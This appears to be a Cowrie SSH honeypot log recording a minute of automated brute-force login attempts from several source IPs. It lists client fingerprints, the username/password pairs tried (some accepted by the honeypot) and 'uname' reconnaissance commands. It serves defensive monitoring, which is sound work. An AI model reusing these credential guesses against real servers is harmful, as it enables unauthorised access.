{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:15:12.316773Z","src_ip":"41.226.27.251","session":"ebdb68337fd6"}
{"eventid":"cowrie.login.success","username":"root","password":"123321","message":"login attempt [root/123321] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:15:12.445753Z","src_ip":"41.226.27.251","session":"ebdb68337fd6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:15:13.020205Z","src_ip":"41.226.27.251","session":"ebdb68337fd6"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:15:13.021536Z","src_ip":"41.226.27.251","session":"ebdb68337fd6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:15:13.065301Z","src_ip":"41.226.27.251","session":"ebdb68337fd6"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:15:13.066454Z","src_ip":"41.226.27.251","session":"ebdb68337fd6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49464,"dst_ip":"1.2.3.4","dst_port":22,"session":"78f5523fae7e","protocol":"ssh","message":"New connection: 212.227.235.229:49464 (1.2.3.4:22) [session: 78f5523fae7e]","sensor":"my-vps","timestamp":"2025-08-31T03:15:14.035275Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:15:14.779845Z","src_ip":"212.227.235.229","session":"78f5523fae7e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:15:14.781311Z","src_ip":"212.227.235.229","session":"78f5523fae7e"}
{"eventid":"cowrie.session.closed","duration":"22.0","message":"Connection lost after 22.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:15:16.731892Z","src_ip":"212.227.125.160","session":"588391b1bf49"}
{"eventid":"cowrie.login.failed","username":"git","password":"password1","message":"login attempt [git/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T03:15:20.675316Z","src_ip":"212.227.235.229","session":"78f5523fae7e"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:15:22.491590Z","src_ip":"212.227.235.229","session":"78f5523fae7e"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":57996,"dst_ip":"1.2.3.4","dst_port":22,"session":"0d4b2538aa79","protocol":"ssh","message":"New connection: 41.226.27.251:57996 (1.2.3.4:22) [session: 0d4b2538aa79]","sensor":"my-vps","timestamp":"2025-08-31T03:15:32.191980Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:15:32.267118Z","src_ip":"41.226.27.251","session":"0d4b2538aa79"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:15:32.267885Z","src_ip":"41.226.27.251","session":"0d4b2538aa79"}
{"eventid":"cowrie.login.failed","username":"worker","password":"worker123","message":"login attempt [worker/worker123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:15:32.448056Z","src_ip":"41.226.27.251","session":"0d4b2538aa79"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:15:33.722644Z","src_ip":"41.226.27.251","session":"0d4b2538aa79"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"28.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 28.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:15:34.622914Z","src_ip":"212.227.125.160","session":"914fac08b192"}
{"eventid":"cowrie.session.closed","duration":"100.4","message":"Connection lost after 100.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:15:34.623999Z","src_ip":"212.227.125.160","session":"914fac08b192"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39620,"dst_ip":"1.2.3.4","dst_port":22,"session":"038de24dead4","protocol":"ssh","message":"New connection: 212.227.125.160:39620 (1.2.3.4:22) [session: 038de24dead4]","sensor":"my-vps","timestamp":"2025-08-31T03:15:35.879056Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:15:36.422265Z","src_ip":"212.227.125.160","session":"038de24dead4"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:15:36.423058Z","src_ip":"212.227.125.160","session":"038de24dead4"}
{"eventid":"cowrie.login.failed","username":"git","password":"password1","message":"login attempt [git/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T03:15:38.199138Z","src_ip":"212.227.125.160","session":"038de24dead4"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:15:39.653740Z","src_ip":"212.227.125.160","session":"038de24dead4"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63130,"dst_ip":"1.2.3.4","dst_port":22,"session":"010ec9a6b624","protocol":"ssh","message":"New connection: 217.72.205.35:63130 (1.2.3.4:22) [session: 010ec9a6b624]","sensor":"my-vps","timestamp":"2025-08-31T03:15:40.801478Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:15:40.802626Z","src_ip":"217.72.205.35","session":"010ec9a6b624"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42246,"dst_ip":"1.2.3.4","dst_port":22,"session":"e72cc56114a4","protocol":"ssh","message":"New connection: 212.227.235.229:42246 (1.2.3.4:22) [session: e72cc56114a4]","sensor":"my-vps","timestamp":"2025-08-31T03:15:41.170741Z"}
{"eventid":"cowrie.login.success","username":"root","password":"4r3e2w1q","message":"login attempt [root/4r3e2w1q] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:15:43.416052Z","src_ip":"212.227.235.229","session":"78733c97b4b3"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:15:44.547401Z","src_ip":"212.227.235.229","session":"e72cc56114a4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:15:44.548654Z","src_ip":"212.227.235.229","session":"e72cc56114a4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37264,"dst_ip":"1.2.3.4","dst_port":22,"session":"544ad01bf160","protocol":"ssh","message":"New connection: 212.227.125.160:37264 (1.2.3.4:22) [session: 544ad01bf160]","sensor":"my-vps","timestamp":"2025-08-31T03:15:46.816679Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:15:46.817322Z","src_ip":"212.227.125.160","session":"544ad01bf160"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-31T03:15:47.079167Z","src_ip":"212.227.125.160","session":"544ad01bf160"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:15:50.983561Z","src_ip":"212.227.235.229","session":"78733c97b4b3"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:15:50.984317Z","src_ip":"212.227.235.229","session":"78733c97b4b3"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":55596,"dst_ip":"1.2.3.4","dst_port":22,"session":"94cb81b044b1","protocol":"ssh","message":"New connection: 41.226.27.251:55596 (1.2.3.4:22) [session: 94cb81b044b1]","sensor":"my-vps","timestamp":"2025-08-31T03:15:52.624627Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:15:52.630575Z","src_ip":"41.226.27.251","session":"94cb81b044b1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:15:52.669173Z","src_ip":"41.226.27.251","session":"94cb81b044b1"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser123","message":"login attempt [ftpuser/ftpuser123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:15:52.844100Z","src_ip":"41.226.27.251","session":"94cb81b044b1"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:15:54.115210Z","src_ip":"41.226.27.251","session":"94cb81b044b1"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:15:54.816837Z","src_ip":"212.227.125.160","session":"544ad01bf160"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"5.6","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:15:56.625736Z","src_ip":"212.227.235.229","session":"78733c97b4b3"}
{"eventid":"cowrie.session.closed","duration":"83.1","message":"Connection lost after 83.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:15:56.626929Z","src_ip":"212.227.235.229","session":"78733c97b4b3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33014,"dst_ip":"1.2.3.4","dst_port":22,"session":"daa2ee17b204","protocol":"ssh","message":"New connection: 212.227.125.160:33014 (1.2.3.4:22) [session: daa2ee17b204]","sensor":"my-vps","timestamp":"2025-08-31T03:15:57.423172Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:15:57.423850Z","src_ip":"212.227.125.160","session":"daa2ee17b204"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:15:57.664907Z","src_ip":"212.227.125.160","session":"daa2ee17b204"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"Passw0rd@1234","message":"login attempt [ubuntu/Passw0rd@1234] failed","sensor":"my-vps","timestamp":"2025-08-31T03:15:58.678020Z","src_ip":"212.227.125.160","session":"daa2ee17b204"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:15:59.923465Z","src_ip":"212.227.125.160","session":"daa2ee17b204"}
{"eventid":"cowrie.login.failed","username":"plexserver","password":"plexserver","message":"login attempt [plexserver/plexserver] failed","sensor":"my-vps","timestamp":"2025-08-31T03:16:07.470355Z","src_ip":"212.227.235.229","session":"e72cc56114a4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38956,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a50819265c5","protocol":"ssh","message":"New connection: 212.227.125.160:38956 (1.2.3.4:22) [session: 8a50819265c5]","sensor":"my-vps","timestamp":"2025-08-31T03:16:11.514145Z"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":59332,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad3fdce3720b","protocol":"ssh","message":"New connection: 41.226.27.251:59332 (1.2.3.4:22) [session: ad3fdce3720b]","sensor":"my-vps","timestamp":"2025-08-31T03:16:13.148789Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:16:13.149748Z","src_ip":"41.226.27.251","session":"ad3fdce3720b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"mes